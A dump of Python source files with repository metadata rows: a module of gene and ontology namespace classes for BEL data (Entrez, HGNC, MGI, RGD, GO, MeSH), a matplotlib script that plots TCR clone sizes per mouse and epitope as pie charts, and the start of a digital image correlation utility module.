''' Return set of name synonyms. Default = None. '''
return None
def get_alt_ids(self, term_id):
''' Returns set of alternative IDs. IDs should be
unique. '''
try:
alt_ids = self._dict.get(term_id).get('alt_ids')
except:
alt_ids = set()
if alt_ids:
alt_ids = {a.lstrip(self._prefix.upper() + ':') for a in alt_ids}
alt_ids = {a.lstrip(self._prefix.upper() + 'ID:') for a in alt_ids}
return alt_ids
def write_ns_values(self, dir):
data_names = {}
data_ids = {}
for term_id in self.get_values():
encoding = self.get_encoding(term_id)
label = self.get_label(term_id)
data_names[label] = encoding
data_ids[term_id] = encoding
if self.get_alt_ids(term_id):
for alt_id in self.get_alt_ids(term_id):
data_ids[alt_id] = encoding
if self.labels:
self.write_data(data_names, dir, self._name + '.belns')
if self.ids:
self.write_data(data_ids, dir, self._name + '-ids.belns')
def write_data(self, data, dir, name):
if len(data) == 0:
print(' WARNING: skipping writing ' +
name + '; no namespace data found.')
else:
with open(os.path.join(dir, name), mode='w', encoding='utf8') as f:
# insert header chunk
if os.path.exists(dir + '/templates/' + name):
tf = open(dir + '/templates/' + name, encoding="utf-8")
header = tf.read().rstrip()
tf.close()
# add Namespace, Citation and Author values
# source_file attribute added to object during parsing
header = get_citation_info(name, header, self.source_file)
else:
print(
'WARNING: Missing header template for {0}'.format(name))
header = '[Values]'
f.write(header + '\n')
# write data
for i in sorted(data.items()):
f.write('|'.join(i) + '\n')
def __str__(self):
return self._prefix
class StandardCustomData(NamespaceDataSet, HistoryDataSet):
def __init__(self, dictionary={}, *, name, prefix, domain):
super().__init__(dictionary, name, prefix, domain)
self._dict = {} # make unique dict for each instance of class
def get_values(self):
for term_id in self._dict:
if term_id is not None and self._dict.get(
term_id).get('OBSOLETE') != 1:
yield term_id
def get_label(self, term_id):
''' Return the value to be used as the preferred
label for the associated term id. '''
label = self._dict.get(term_id).get('LABEL')
return label
def get_xrefs(self, term_id):
xrefs = set(self._dict.get(term_id).get('XREF').split('|'))
xrefs = {x.strip() for x in xrefs if ':' in x}
return xrefs
def get_species(self, term_id):
species = self._dict.get(term_id).get('SPECIES')
return species
def get_encoding(self, term_id):
encoding = self._dict.get(term_id).get('TYPE')
return encoding
def get_alt_names(self, term_id):
synonyms = set()
synonyms.update(self._dict.get(term_id).get('SYNONYMS').split('|'))
synonyms = {s for s in synonyms if s}
return synonyms
def get_obsolete_ids(self):
''' return dict with all obsolete ids, and current value.'''
# TODO Add alt id handling,
value = None
replacement_dict = {}
for term_id in self._dict:
if self._dict.get(term_id).get('OBSOLETE') == 1:
mapping = self._dict.get(term_id)
value = 'withdrawn'
replacement_dict[term_id] = value
return replacement_dict
class EntrezInfoData(NamespaceDataSet):
ENC = {
'protein-coding': 'GRP', 'miscRNA': 'GR', 'ncRNA': 'GR',
'snoRNA': 'GR', 'snRNA': 'GR', 'tRNA': 'GR', 'scRNA': 'GR',
'other': 'G', 'pseudo': 'GR', 'unknown': 'GRP', 'rRNA': 'GR'
}
subject = "gene/RNA/protein"
description = "NCBI Entrez Gene identifiers for Homo sapiens, Mus musculus, and Rattus norvegicus."
def __init__(
self,
dictionary={},
*,
name='entrez-gene',
prefix='egid',
domain=['gene and gene product'],
ids=True,
labels=False):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
self.labels = labels
def get_label(self, term_id):
''' Return the value to be used as the preffered
label for the associated term id. For Entrez,
using the gene ID. '''
return term_id
def get_species(self, term_id):
''' Return species as NCBI tax ID (or None, as applicable). '''
species = self._dict.get(term_id).get('tax_id')
return species
def get_encoding(self, gene_id):
''' Return encoding (allowed abundance types) for value. '''
mapping = self._dict.get(gene_id)
gene_type = mapping.get('type_of_gene')
description = mapping.get('description')
encoding = EntrezInfoData.ENC.get(gene_type, 'G')
if gene_type == 'ncRNA' and 'microRNA' in description:
encoding = 'GRM'
if gene_type not in EntrezInfoData.ENC:
print(
'WARNING ' +
gene_type +
' not defined for Entrez. G assigned as default encoding.')
return encoding
def get_xrefs(self, term_id):
''' Returns xrefs to HGNC, MGI, RGD. '''
targets = ('MGI:', 'HGNC:', 'RGD:')
xrefs = set()
mapping = self._dict.get(term_id)
xrefs.update(mapping.get('dbXrefs').split('|'))
# normalize xrefs with duplicated prefix
# e.g., HGNC:HGNC:5
xrefs = {x.split(':', x.count(':') - 1)[-1] for x in xrefs}
xrefs = {x for x in xrefs if x.startswith(targets)}
return xrefs
def get_alt_symbols(self, gene_id):
''' Return set of symbol synonyms. '''
synonyms = set()
mapping = self._dict.get(gene_id)
if mapping.get('Synonyms') is not '-':
synonyms.update(mapping.get('Synonyms').split('|'))
synonyms.add(mapping.get('Symbol'))
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('Other_designations') is not '-':
synonyms.update(mapping.get('Other_designations').split('|'))
if mapping.get('description') != '-':
synonyms.add(mapping.get('description'))
return synonyms
def get_name(self, term_id):
''' Get official term name. '''
mapping = self._dict.get(term_id)
name = mapping.get('Full_name_from_nomenclature_authority')
return name
class EntrezHistoryData(HistoryDataSet):
def __init__(self, dictionary={}, prefix='egid'):
super().__init__(dictionary, prefix)
class HGNCData(NamespaceDataSet, OrthologyData, HistoryDataSet):
ENC = {
'gene with protein product': 'GRP', 'RNA, cluster': 'GR',
'RNA, long non-coding': 'GR', 'RNA, micro': 'GRM',
'RNA, ribosomal': 'GR', 'RNA, small cytoplasmic': 'GR',
'RNA, small misc': 'GR', 'RNA, small nuclear': 'GR',
'RNA, small nucleolar': 'GR', 'RNA, transfer': 'GR',
'phenotype only': 'G', 'RNA, pseudogene': 'GR',
'T cell receptor pseudogene': 'GR',
'immunoglobulin pseudogene': 'GR', 'pseudogene': 'GR',
'T cell receptor gene': 'GRP',
'complex locus constituent': 'GRP',
'endogenous retrovirus': 'G', 'fragile site': 'G',
'immunoglobulin gene': 'GRP', 'protocadherin': 'GRP',
'readthrough': 'GR', 'region': 'G',
'transposable element': 'G', 'unknown': 'GRP',
'virus integration site': 'G', 'RNA, micro': 'GRM',
'RNA, misc': 'GR', 'RNA, Y': 'GR', 'RNA, vault': 'GR',
'T-cell receptor gene':'G','T-cell receptor pseudogene':'G',
}
def __init__(
self,
dictionary={},
*,
name='hgnc-human-genes',
prefix='hgnc',
domain=['gene and gene product']):
super().__init__(dictionary, name, prefix, domain)
def get_values(self):
for term_id in self._dict:
if '~withdrawn' not in self._dict.get(term_id).get('Symbol'):
yield term_id
def get_id_update(self, term_id):
mapping = self._dict.get(term_id)
if mapping is None:
return None
else:
if mapping.get('Locus Type') == 'withdrawn':
name = self.get_name(term_id)
if 'entry withdrawn' in name:
return 'withdrawn'
elif 'symbol withdrawn' in name:
new_symbol = name.split('see ')[1]
new_id = None
for term_id in self._dict:
if new_symbol == self.get_label(term_id):
new_id = term_id
continue
return new_id
else:
return term_id
def get_obsolete_ids(self):
obsolete = {}
for term_id in self._dict:
if 'withdrawn' in self.get_label(term_id):
obsolete[term_id] = self.get_id_update(term_id)
return obsolete
def get_label(self, term_id):
''' Return preferred label associated with term id. '''
mapping = self._dict.get(term_id)
if mapping is None:
return None
else:
label = mapping.get('Symbol')
return label
def get_encoding(self, term_id):
mapping = self._dict.get(term_id)
locus_type = mapping.get('Locus Type')
encoding = HGNCData.ENC.get(locus_type, 'G')
if locus_type not in HGNCData.ENC:
print(
'WARNING ' +
locus_type +
' not defined for HGNC. G assigned as default encoding.')
return encoding
def get_species(self, term_id):
return '9606'
def get_alt_symbols(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('Synonyms'):
symbol_synonyms = [s.strip()
for s in mapping.get('Synonyms').split(',')]
synonyms.update(symbol_synonyms)
if mapping.get('Previous Symbols'):
old_symbols = [s.strip()
for s in mapping.get('Previous Symbols').split(',')]
synonyms.update(old_symbols)
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('Previous Names'):
old_names = [s.strip('" ') for s in mapping.get(
'Previous Names').split(', "')]
synonyms.update(old_names)
return synonyms
def get_name(self, term_id):
mapping = self._dict.get(term_id)
name = mapping.get('Approved Name')
return name
def get_orthologs(self, term_id):
orthologs = set()
mapping = self._dict.get(term_id)
mouse_orthologs = mapping.get('mouse_ortholog_id').split('|')
orthologs.update(mouse_orthologs)
rat_orthologs = mapping.get('rat_ortholog_id').split('|')
orthologs.update(rat_orthologs)
return orthologs
class MGIData(NamespaceDataSet):
ENC = {
'gene': 'GRP', 'protein coding gene': 'GRP',
'non-coding RNA gene': 'GR', 'rRNA gene': 'GR',
'tRNA gene': 'GR', 'snRNA gene': 'GR', 'snoRNA gene': 'GR',
'miRNA gene': 'GRM', 'scRNA gene': 'GR',
'lincRNA gene': 'GR', 'RNase P RNA gene': 'GR',
'RNase MRP RNA gene': 'GR', 'telomerase RNA gene': 'GR',
'unclassified non-coding RNA gene': 'GR',
'heritable phenotypic marker': 'G', 'gene segment': 'G',
'unclassified gene': 'GRP', 'other feature types': 'G',
'pseudogene': 'GR', 'transgene': 'G',
'other genome feature': 'G', 'pseudogenic region': 'GR',
'polymorphic pseudogene': 'GRP',
'pseudogenic gene segment': 'GR', 'SRP RNA gene': 'GR',
'antisense lncRNA gene': 'GR', 'lncRNA gene': 'GR',
'intronic lncRNA gene': 'GR', 'ribozyme gene': 'GR'
}
def __init__(
self,
dictionary={},
*,
name='mgi-mouse-genes',
prefix='mgi',
domain=['gene and gene product']):
super().__init__(dictionary, name, prefix, domain)
def get_values(self):
for term_id in self._dict:
mapping = self._dict.get(term_id)
marker_type = mapping.get('Marker Type')
if marker_type == 'Gene' or marker_type == 'Pseudogene':
yield term_id
def get_species(self, term_id):
return '10090'
def get_encoding(self, term_id):
feature_type = self._dict.get(term_id).get('Feature Type')
encoding = self.ENC.get(feature_type, 'G')
if feature_type not in self.ENC:
print(
'WARNING ' +
feature_type +
' not defined for MGI. G assigned as default encoding.')
return encoding
def get_label(self, term_id):
try:
label = self._dict.get(term_id).get('Symbol')
return label
except:
return None
def get_name(self, term_id):
mapping = self._dict.get(term_id)
name = mapping.get('Marker Name')
return name
def get_alt_symbols(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms = mapping.get('Marker Synonyms').split('|')
synonyms = {s for s in synonyms if s}
return synonyms
class RGDData(NamespaceDataSet):
ENC = {
'gene': 'GRP', 'miscrna': 'GR', 'predicted-high': 'GRP',
'predicted-low': 'GRP', 'predicted-moderate': 'GRP',
'protein-coding': 'GRP', 'pseudo': 'GR', 'snrna': 'GR',
'trna': 'GR', 'rrna': 'GR', 'ncrna': 'GR'
}
def __init__(
self,
dictionary={},
*,
name='rgd-rat-genes',
prefix='rgd',
domain=['gene and gene product']):
super().__init__(dictionary, name, prefix, domain)
def get_species(self, term_id):
''' Rat '''
return '10116'
def get_label(self, term_id):
''' Use Symbol as preferred label for RGD. '''
try:
label = self._dict.get(term_id).get('SYMBOL')
return label
except:
return None
def get_name(self, term_id):
name = self._dict.get(term_id).get('NAME')
return name
def get_encoding(self, term_id):
gene_type = self._dict.get(term_id).get('GENE_TYPE')
name = self.get_name(term_id)
encoding = RGDData.ENC.get(gene_type, 'G')
if gene_type == 'miscrna' or gene_type == 'ncrna' and 'microRNA' in name:
encoding = 'GRM'
if gene_type not in RGDData.ENC:
print(
'WARNING ' +
gene_type +
' not defined for RGD. G assigned as default encoding.')
return encoding
def get_alt_symbols(self, term_id):
synonyms = set()
if self._dict.get(term_id).get('OLD_SYMBOL'):
old_symbols = self._dict.get(term_id).get('OLD_SYMBOL').split(';')
synonyms.update(old_symbols)
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('OLD_NAME'):
old_names = mapping.get('OLD_NAME').split(';')
synonyms.update(old_names)
synonyms = {s for s in synonyms if s}
return synonyms
class RGDObsoleteData(HistoryDataSet):
def __init__(self, dictionary={}, prefix='rgd'):
super().__init__(dictionary, prefix)
class SwissProtData(NamespaceDataSet):
def __init__(
self,
dictionary=defaultdict(list),
*,
name='swissprot',
prefix='sp',
domain=['gene and gene product'],
ids=True):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
def get_encoding(self, term_id):
return 'GRP'
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_name(self, term_id):
mapping = self._dict.get(term_id)
name = mapping.get('recommendedFullName')
return name
def get_alt_ids(self, term_id):
alt_ids = self._dict.get(term_id).get('accessions')
alt_ids = set(alt_ids)
alt_ids = {alt_id for alt_id in alt_ids if alt_id != term_id}
return alt_ids
def get_alt_symbols(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('alternativeShortNames'))
if mapping.get('recommendedShortName'):
synonyms.add(mapping.get('recommendedShortname'))
if mapping.get('geneName'):
synonyms.add(mapping.get('geneName'))
if mapping.get('geneSynonyms'):
synonyms.update(mapping.get('geneSynonyms'))
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('alternativeFullNames'))
return synonyms
def get_xrefs(self, term_id):
''' Returns GeneIDs or HGNC/MGI/RGD IDs. '''
mapping = self._dict.get(term_id)
xrefs = set()
xrefs_dict = mapping.get('dbreference')
for ns, values in xrefs_dict.items():
if ns == 'GeneId':
values = {('EGID:' + v) for v in values}
xrefs.update(values)
elif ns == 'HGNC' or ns == 'MGI':
xrefs.update(values)
elif ns == 'RGD':
values = {('RGD:' + v) for v in values}
xrefs.update(values)
return xrefs
def get_species(self, term_id):
species = self._dict.get(term_id).get('tax_id')
return species
class AffyData(NamespaceDataSet):
def __init__(
self,
dictionary=defaultdict(list),
*,
name='affy-probeset',
prefix='affx',
domain=['gene and gene product'],
ids=True,
labels=False):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
self.labels = labels
def get_species(self, term_id):
species = self._dict.get(term_id).get('Species')
species_dict = {'Homo sapiens': '9606',
'Mus musculus': '10090',
'Rattus norvegicus': '10116'}
tax_id = species_dict.get(species)
return tax_id
def get_encoding(self, term_id):
''' Return encoding (allowed abundance types) for value.
R - RNAAbundance. '''
return 'R'
def get_xrefs(self, term_id):
''' Returns equivalent Entrez Gene IDs for value . '''
entrez_ids = self._dict.get(term_id).get('Entrez Gene').split('///')
if entrez_ids[0] == '---':
return None
else:
entrez_ids = ['EGID:' + eid.strip() for eid in entrez_ids]
return set(entrez_ids)
class CHEBIData(NamespaceDataSet):
def __init__(
self,
dictionary={},
*,
name='chebi',
prefix='chebi',
domain=['chemical'],
ids=True):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('synonyms'):
synonyms.update(mapping.get('synonyms'))
return synonyms
class Gene2AccData(DataSet):
def __init__(self, dictionary={}, prefix='gene2acc'):
super().__init__(dictionary, prefix)
def get_eq_values(self):
for entrez_gene in self._dict:
mapping = self._dict.get(entrez_gene)
status = mapping.get('status')
taxid = mapping.get('tax_id')
yield entrez_gene, status, taxid
class GOData(NamespaceDataSet, HistoryDataSet):
# dictionary is required, since GO file parsed into multiple objects
def __init__(self, dictionary, *, name, prefix, domain, ids=True):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
def get_values(self):
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
continue
else:
yield term_id
def get_obsolete_ids(self):
obsolete = {}
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
obsolete[term_id] = 'withdrawn'
return obsolete
def get_id_update(self, term_id):
if self._dict.get(term_id):
if self._dict.get(term_id).get('is_obsolete'):
return 'withdrawn'
else:
return term_id
else:
return None
def get_label(self, term_id):
label = self._dict.get(term_id).get('termname')
return label
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('synonyms'))
return synonyms
def get_encoding(self, term_id):
if self._dict.get(term_id).get('complex'):
encoding = 'C'
elif self._prefix == 'gobp':
encoding = 'B'
else:
encoding = 'A'
return encoding
class MESHData(NamespaceDataSet):
# NOTE dictionary and other arguments are required since MeSH file parsed
# into multiple objects
def __init__(
self,
dictionary,
*,
name,
prefix,
domain,
ids=True,
scheme_type=['ns']):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
self.scheme_type = scheme_type
def get_label(self, term_id):
label = self._dict.get(term_id).get('mesh_header')
return label
def get_encoding(self, term_id):
if self._prefix == 'meshd':
return 'O'
elif self._prefix == 'meshpp':
return 'B'
else:
return 'A'
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
if 'anno' not in self.scheme_type:
return None
else:
if self._prefix == 'meshd':
return {'Disease'}
elif self._prefix == 'mesha':
return {'Anatomy'}
elif self._prefix == 'meshcs':
return {'Location'}
else:
return None
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('synonyms'))
return synonyms
class SwissWithdrawnData(HistoryDataSet):
def __init__(self, dictionary={}, prefix='sp'):
super().__init__(dictionary, prefix)
def get_obsolete_ids(self):
accessions = self._dict.get('accessions')
obsolete = {}
for a in accessions:
obsolete[a] = 'withdrawn'
return obsolete
def get_id_update(self, term_id):
if term_id in self._dict.get('accessions'):
return 'withdrawn'
else:
return None
class OWLData(NamespaceDataSet, HistoryDataSet):
def __init__(
self,
dictionary={},
*,
name,
prefix,
domain,
ids=True,
scheme_type):
super().__init__(dictionary, name, prefix, domain)
self._dict = {} # make unique dict for each instance of class
self.ids = ids
self.scheme_type = scheme_type
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_encoding(self, term_id):
return 'O'
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
concept_type = set()
if 'anno' not in self.scheme_type:
return None
elif self._prefix == 'clo':
concept_type = {'CellLine'}
elif self._prefix == 'cl':
concept_type = {'Cell'}
elif self._prefix == 'uberon':
concept_type = {'Anatomy'}
elif self._prefix == 'efo':
concept_type = self._dict.get(term_id).get("term_type")
elif self._prefix == 'do':
concept_type = {'Disease'}
return concept_type
def get_alt_names(self, term_id):
mapping = self._dict.get(term_id)
synonyms = set(mapping.get('synonyms'))
return synonyms
def find_xref(self, ref):
''' Used only in equiv module. '''
for term_id, mapping in self._dict.items():
dbxrefs = mapping.get('dbxrefs')
if ref in dbxrefs:
return term_id
def get_xrefs(self, term_id):
''' Returns MeSH (MSH) xrefs for a given DO ID . '''
xrefs = set()
mapping = self._dict.get(term_id)
xrefs.update(mapping.get('dbxrefs'))
if self._prefix == 'do':
xrefs = {x.replace('MSH:', 'MESHD:')
for x in xrefs if x.startswith('MSH:')}
return xrefs
def get_obsolete_ids(self):
obsolete = {}
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
obsolete[term_id] = 'withdrawn'
return obsolete
def get_id_update(self, term_id):
if self._dict.get(term_id):
if self._dict.get(term_id).get('is_obsolete'):
return 'withdrawn'
else:
return term_id
else:
return None
class NCBITaxonomyData(NamespaceDataSet):
def __init__(
self,
dictionary={},
*,
name,
prefix,
domain,
ids=True,
scheme_type):
super().__init__(dictionary, name, prefix, domain)
self.scheme_type = scheme_type
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_alt_names(self, term_id):
mapping = self._dict.get(term_id)
synonyms = set(mapping.get('synonyms'))
return synonyms
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
if 'anno' not in self.scheme_type:
return None
else:
return {'Species'}
| apache-2.0 | -6,744,172,609,000,880,000 | 31.792934 | 109 | 0.536599 | false | 3.776673 | false | false | false |
phbradley/tcr-dist | make_mouse_table.py | 1 | 8705 | from basic import *
import html_colors
import util
with Parser(locals()) as p:
# p.str('args').unspecified_default().multiple().required()
p.str('clones_file').required()
p.str('outfile_prefix')
p.flag('horizontal_lines')
p.flag('show')
p.flag('include_counts_in_mouse_labels')
if not outfile_prefix:
outfile_prefix = clones_file[:-4]
import matplotlib
if not show: matplotlib.use('Agg')
import matplotlib.pyplot as plt
#import numpy as np
# all_tcrs = {}
# all_epitopes = []
# infields = []
# for line in open( clones_file,'r'):
# if not infields:
# if line[0] == '#':
# infields = line[1:-1].split('\t')
# else:
# infields = line[:-1].split('\t')
# continue
# assert infields
# l = parse_tsv_line( line[:-1], infields )
# mouse = l['mouse']
# epitope = l['epitope']
# clone_size = int(l['clone_size'])
# if mouse not in all_tcrs:
# all_tcrs[mouse] = {}
# if epitope not in all_tcrs[mouse]:
# all_tcrs[mouse][epitope] = []
# if epitope not in all_epitopes:
# all_epitopes.append( epitope )
# all_tcrs[mouse][epitope].append( clone_size ) ## just store the clone sizes
all_tcrs = parse_tsv_file( clones_file, ['subject','epitope'], ['clone_size'], False )
all_epitopes = list( reduce( set.union, ( set( x.keys() ) for x in all_tcrs.values() ) ) )
all_epitopes.sort()
all_mice= all_tcrs.keys()[:]
all_mice.sort()
counts = {}
for e in all_epitopes: counts[e] = [0,0]
for m in all_mice: counts[m] = [0,0]
for mouse in all_tcrs:
for epitope in all_tcrs[mouse]:
clone_sizes = [int(x[0]) for x in all_tcrs[mouse][epitope]]
total_reads = sum(clone_sizes)
for k in [mouse,epitope]:
counts[k][0] += len(clone_sizes)
counts[k][1] += total_reads
mouse_labels = {}
for mouse in all_mice:
if include_counts_in_mouse_labels:
mouse_labels[mouse] = '{} ({};{})'.format( mouse, counts[mouse][0], counts[mouse][1] )
else:
mouse_labels[mouse] = mouse
epitope_labels = {}
for epitope in all_epitopes:
epitope_labels[epitope] = '{} ({};{})'.format( epitope, counts[epitope][0], counts[epitope][1] )
nrows = len( all_mice )
ncols = len( all_epitopes )
preferred_plot_width = 12.0
preferred_plot_height = 12.0
preferred_cell_size = max( 0.5, min( preferred_plot_height/nrows, preferred_plot_width/ncols ) )
plot_width = ncols * preferred_cell_size
plot_height = nrows * preferred_cell_size
fontsize_small = 8.
fontsize_medium = 10.
fontsize_names = 12.
for repeat in range(3):
if plot_width <= 1.2 * preferred_plot_width and plot_height <= 1.2 * preferred_plot_height: break
if plot_width / preferred_plot_width > plot_height / preferred_plot_height: ## too wide
plot_width *= 0.75
plot_height *= 0.9
fontsize_small *= 0.9
fontsize_medium *= 0.9
else: ## too tall
plot_height *= 0.75
plot_width *= 0.9
fontsize_small *= 0.9
fontsize_medium *= 0.9
fontsize_small = max(5,int(floor(0.5+fontsize_small)))
fontsize_medium = max(6,int(floor(0.5+fontsize_medium)))
fudge = 1.2
bottom_spacer = 0.3 # inches
left_margin_inches = fudge * max( ( len(mouse_labels[x]) for x in all_mice ) ) * 0.6 * fontsize_names / 72.0
bottom_margin_inches = fudge * max( ( len(epitope_labels[x]) for x in all_epitopes ) ) * 0.75 * fontsize_names / 72.0 + bottom_spacer
top_margin_inches = 0.25
right_margin_inches = 0.25
fig_width = left_margin_inches + plot_width + right_margin_inches
fig_height = bottom_margin_inches + plot_height + top_margin_inches
top_margin = float( bottom_margin_inches + plot_height ) / fig_height
bottom_margin = float( bottom_margin_inches ) / fig_height
left_margin = float( left_margin_inches ) / fig_width
right_margin = float( left_margin_inches + plot_width ) / fig_width
print 'fig_width: {:.1f} fig_height: {:.1f}'.format(fig_width,fig_height)
fig = plt.figure(1,figsize=(fig_width,fig_height))
#fig = plt.figure(1,figsize=(23,8))
#fig1.add_line(Line2D([0.5,0.5], [0,1], linewidth=2, color='blue'))
#ax = fig.add_axes( [ left_margin, bottom_margin, right_margin,top_margin ] )
#ax.grid(True)
plotno=0
for mouse in all_mice:
for epitope in all_epitopes:
plotno += 1
if epitope not in all_tcrs[mouse]:
continue
plt.subplot( nrows, ncols, plotno )
clone_sizes = [int(x[0]) for x in all_tcrs[mouse][epitope]]
clone_sizes.sort()
clone_sizes.reverse()
colors = html_colors.get_rank_colors_no_lights(len(clone_sizes))
wedges, texts = plt.pie( clone_sizes )
for ii,w in enumerate(wedges):
w.set_edgecolor('none')
w.set_facecolor(colors[ii])
topsize = clone_sizes[0]
total_size = sum(clone_sizes)
## show the size of the largest wedge?
if len(wedges)>1:
w = wedges[0]
#print w.center, w.r, w.theta1, w.theta2
## show the size at radius distance in middle of edge
angle_degrees = w.theta2*0.5
if 65<=angle_degrees<=115: angle_degrees = 65. if angle_degrees < 90. else 115.
x=1.1*w.r*math.cos( math.pi * angle_degrees / 180.0 )
y=1.1*w.r*math.sin( math.pi * angle_degrees / 180.0 )
thresh = 0.3*w.r
ha = 'left' if x>thresh else ( 'center' if x>-thresh else 'right' )
va = 'bottom' if y>thresh else ( 'center' if y>-thresh else 'top' )
plt.text(x,y,`topsize`,fontdict={'fontsize':fontsize_small},color='r',
horizontalalignment=ha,verticalalignment=va)
## show the total number of reads
radius = wedges[0].r
plt.text(0,-1.1*radius,`total_size`,fontdict={'fontsize':fontsize_medium},
horizontalalignment='center',verticalalignment='top' )
#t = plt.title(`sum(clone_sizes)`,fontdict={'fontsize':8})
if False:
if epitope==all_epitopes[0]:
plt.title(mouse)
elif mouse==all_mice[0]:
plt.title(epitope)
#break
#break
#plt.hlines(0.5,0.0,1.0)
#plt.vlines(0.5,0.0,1.0)
epsilon = 0.0
plt.subplots_adjust(
left=left_margin+epsilon,
right=right_margin-epsilon,
bottom=bottom_margin+epsilon,
top=top_margin-epsilon
)
ywidth = (top_margin-bottom_margin) / ( len(all_mice) )
xwidth = (right_margin-left_margin) / ( len(all_epitopes) )
#ystep = (top_margin-bottom_margin) / ( len(all_epitopes)-1 )
lines = []
# if horizontal_lines:
# for ii in range(len(all_epitopes)):
# #for ii in range(len(all_epitopes)+1):
# y = bottom_margin + 1.02 * ii * ywidth
# lines.append( matplotlib.lines.Line2D( [0,1], [y,y],
# transform=fig.transFigure, figure=fig, c='k' ) )
if False:
for ii in range(len(all_mice)+1):
x = left_margin + ii*xwidth
lines.append( matplotlib.lines.Line2D( [x,x], [0,1],
transform=fig.transFigure, figure=fig, c='k' ) )
fig.lines.extend(lines)
for ii,mouse in enumerate( all_mice ):
plt.figtext( left_margin-0.005, top_margin - 3*ywidth/5 - ii * ywidth, mouse_labels[mouse], ha='right', va='center',
fontdict={'fontsize':fontsize_names})
#plt.figtext( right_margin+0.005, top_margin - 3*ywidth/5 - ii * ywidth, epitope,ha='left')
#xstep = (right_margin-left_margin) / ( len(all_mice)-1 )
for ii,epitope in enumerate( all_epitopes ):
#name = mouse[:]
# if name[0] == 'd' and 'Mouse' in name:
# name = name.replace('Mouse','_')
plt.figtext(left_margin + xwidth/2 + ii * xwidth, bottom_margin - (bottom_spacer)/fig_height,
epitope_labels[epitope],
rotation='vertical', ha='center', va='top',
fontdict={'fontsize':fontsize_names})
#plt.figtext(left_margin + xwidth/2 + ii * xwidth, 0.98, epitope, ha='center', va='top' )
pngfile = outfile_prefix+'_subject_table.png'
print 'making:',pngfile
plt.savefig(pngfile)
util.readme(pngfile,"""This subject-table plot shows all the successfully parsed, paired reads, split by mouse/subject (the rows)
and epitope (the columns, labeled at the bottom). The epitope column labels include in parentheses the number of clones followed by
the total number of TCRs. Each pie shows the paired reads for a single mouse/epitope combination, with each wedge corresponding to
a clone. The size of the top clone is shown in red near the red wedge, and the total number of reads is shown below the pie in black.
""")
if show:
plt.show()
| mit | -1,046,512,849,625,852,400 | 31.360595 | 133 | 0.611832 | false | 2.993466 | false | false | false |
latture/dic | dic/dic_utils.py | 1 | 3905 | """
:mod:`dic_utils` contains several utility functions used when analyzing DIC data, e.g. determining the step size,
going from pixel to millimeter coordinates, and determining deformations.
"""
import numpy as np
import warnings
__all__ = ["get_step", "point_to_indices", "get_initial_position", "get_displacement", "point_to_position"]
def get_step(dic_data):
"""
Returns the step size of the DIC data
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
Returns
-------
int
Step size.
"""
return dic_data["x"][0, 1] - dic_data["x"][0, 0]
def point_to_indices(dic_data, pt):
"""
Transforms ``(x, y)`` in pixel coordinates into the corresponding ``(row, col)`` to access the closest data point
in the specified DIC data.
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
pt : (x, y)
Two-dimensional coordinates of the pixel in global space.
Returns
-------
(row, col) : (int, int)
The row and column in ``dic_data`` that corresponds to the given pixel point.
"""
step = get_step(dic_data)
keys = ("y", "x")
indices = [None, None]
for i, key in enumerate(keys):
min_key = '{}_min'.format(key)
if min_key in dic_data:
px_min = dic_data[min_key]
else:
px_min = dic_data[key].min()
px = pt[(i + 1) % 2]
indices[i] = int(round((px - px_min) / step))
return indices
def get_initial_position(dic_data, row, col):
"""
Retrieves the initial position (in mm if available, otherwise in pixels) held at the specified row and column.
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
row : int
Row in the DIC data to access.
col : int
Column in the DIC data to access.
Returns
-------
``numpy.ndarray``
Initial position ``(x, y, z)``.
"""
try:
return np.array([dic_data["X"][row, col], dic_data["Y"][row, col], dic_data["Z"][row, col]])
except KeyError:
warnings.warn("Position data in millimeters not provided. Falling back to position in pixels.")
return np.array([dic_data["x"][row, col], dic_data["y"][row, col], dic_data["z"][row, col]])
def get_displacement(dic_data, row, col):
"""
Retrieves the displacement (in mm if available, otherwise in pixels) held at the specified row and column.
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
row : int
Row in the DIC data to access.
col : int
Column in the DIC data to access.
Returns
-------
``numpy.ndarray``
Displacements ``(u, v, w)``.
"""
try:
return np.array([dic_data["U"][row, col], dic_data["V"][row, col], dic_data["W"][row, col]])
except KeyError:
